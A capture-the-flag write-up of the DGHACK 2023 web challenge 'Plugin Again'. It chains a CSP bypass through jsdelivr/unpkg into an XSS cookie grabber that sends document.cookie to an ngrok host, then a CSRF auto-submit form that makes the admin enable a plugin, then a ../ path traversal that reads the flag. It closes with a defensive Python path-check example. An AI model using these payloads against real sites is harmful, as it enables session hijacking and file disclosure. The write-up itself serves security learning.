
CTFs | DGHACK_2023 | Web | Plugin Again

Plugin Again

image

As written in the description of the challenge, we need to read the content of the /FLAG file. We only have access to a URL so we can navigate to the website and we get this:

image

The first thing I noticed was that there is a menu showing which users are connected:

image

Now that we know that Johnny and admin are connected, the first thing that came to my mind was XSS. If we can run XSS on the website, we can recover both session cookies and so, get authenticated. But if we try some basic XSS, we don’t get any result. This is due to the CSP located in the meta tag of the HTML:

image

This policy tells us that JavaScript can only be loaded from the domain cdn.jsdelivr.net. That seems to rule out our XSS, but after a bit of digging, I found this. Here we see that we can still run JavaScript code like the well-known alert(1).

It is recommended to run alert(document.domain) or alert(window.origin) to see if we are executing the script from the current webpage or from a sandbox. More explanation in the LiveOverflow video here.

So now we can try a basic XSS like this one:

image

And we get the following result:

image

As we can see, the domain is the same as our URL. We can now perform an XSS to recover a cookie. I used this really basic payload:

<script src="https://cdn.jsdelivr.net/npm/csp-bypass@1.0.2/dist/sval-classic.min.js"></script>
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
<br csp="fetch('https://4542-195-221-38-254.ngrok-free.app?COOKIE='+document.cookie)">

Don’t forget to launch a Python HTTP server (python3 -m http.server) exposed through ngrok (ngrok http 8000) so that the cookie can reach you.

After a few seconds, we get this result:

image

We can create a cookie named session and set the value to the one we just got. Now we are connected as Johnny:

image

After a while, I still couldn’t get any cookie other than Johnny’s… The admin doesn’t seem to look at the blog posts often… After reading the posts on the blog, we can see a message from the admin talking about sending messages to other users. And now, if we look at the connected users, we get a new option: we can contact them:

image

But when I send the cookie grabber payload (the one from earlier), I can’t interact with the admin options because I am not on the local machine:

image

So we need to find a way to ask the admin to do the work for us… If we look at the post, we find this interesting one:

image

We then go to GitHub, search for this JhonnyTemplater and find this code. We notice that there is a possible LFI here:

image

We now reaaaaalllly want to enable this plugin. As Johnny, we can go to the plugin menu and see that the activate button redirects to /activate-plugin/1:

image

I tried to redirect the admin using document.location or window.open, but without any result… I then found online that some people send a form to another user and use JavaScript to submit it automatically. So I used the following payload:

<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="/activate-plugin/1" method="GET">
  <input type="submit" value="Submit request" />
</form>
<script src="https://cdn.jsdelivr.net/npm/csp-bypass@1.0.2/dist/sval-classic.min.js"></script>
<script src="https://unpkg.com/csp-bypass@1.0.2-0/dist/classic.js"></script>
<br csp="document.getElementById('csrf-form').submit()">

This basically sends the admin user a form containing only a submit button; when he opens the message, the form is submitted automatically, which redirects him to /activate-plugin/1 and activates the plugin.

I first used action=http://website-ybnx6z.inst.malicecyber.com/activate-plugin/1. This worked when I sent the message to myself (Johnny) but not to the admin.

We can now see that we have activated the plugin because we can deactivate it now:

image

Now, we can create a post with a template:

image

If we intercept the request with BurpSuite when we click on Use template, we can see this:

image

We can now replace the theme=funny by theme=../../../../../../../FLAG and now…

image

So the flag is DGHACK{WellD0ne!Bl0ggingIsS0metimeRisky}.
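As an added defensive example (my own code, not the JhonnyTemplater plugin's, which I have not reproduced here), the following Python mirrors the kind of theme-loading defect the theme=../../../../../../../FLAG request exploits and shows the canonicalisation check that stops it. The directory layout, template names and flag contents are constructed for the demo.

```python
import os
import tempfile

# Constructed sample templates (names only; not the real blog's themes).
THEMES = {"funny": "<h1>Funny theme</h1>", "serious": "<h1>Serious theme</h1>"}


def make_sandbox() -> str:
    """Build <root>/FLAG next to <root>/app/templates/<theme> in a temp dir
    and return the templates directory."""
    root = tempfile.mkdtemp()
    tpl_dir = os.path.join(root, "app", "templates")
    os.makedirs(tpl_dir)
    for name, body in THEMES.items():
        with open(os.path.join(tpl_dir, name), "w") as fh:
            fh.write(body)
    with open(os.path.join(root, "FLAG"), "w") as fh:
        fh.write("FLAG{constructed-placeholder}")
    return tpl_dir


def load_theme_vulnerable(tpl_dir: str, theme: str) -> str:
    # Assumed shape of the defect: the user-supplied `theme` parameter is
    # joined onto the templates path with no check, so "../" walks out of it.
    with open(os.path.join(tpl_dir, theme)) as fh:
        return fh.read()


def resolve_theme(tpl_dir: str, theme: str):
    """Return the canonical path of `theme` inside tpl_dir, or None if it escapes."""
    base = os.path.realpath(tpl_dir)
    target = os.path.realpath(os.path.join(base, theme))
    # realpath collapses "..", absolute paths and symlinks before the check,
    # so the comparison is on where the file really is, not on the raw string.
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target


def load_theme_safe(tpl_dir: str, theme: str) -> str:
    target = resolve_theme(tpl_dir, theme)
    if target is None:
        raise PermissionError(f"theme {theme!r} is outside the templates directory")
    with open(target) as fh:
        return fh.read()


if __name__ == "__main__":
    tpl = make_sandbox()
    print(load_theme_vulnerable(tpl, "../../FLAG"))  # the flag file leaks
    print(resolve_theme(tpl, "../../FLAG"))           # None: rejected
```

The same check applies to any "theme", "template" or "file" parameter that ends up in a filesystem path: normalise first, then compare against the allowed base directory.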

We could have tried to get RCE. Indeed, the server is using Flask and the Werkzeug console (more info here). We could have recovered the information in the different files on the server to find the PIN and get RCE in the Werkzeug console.

This post is licensed under CC BY 4.0 by the author.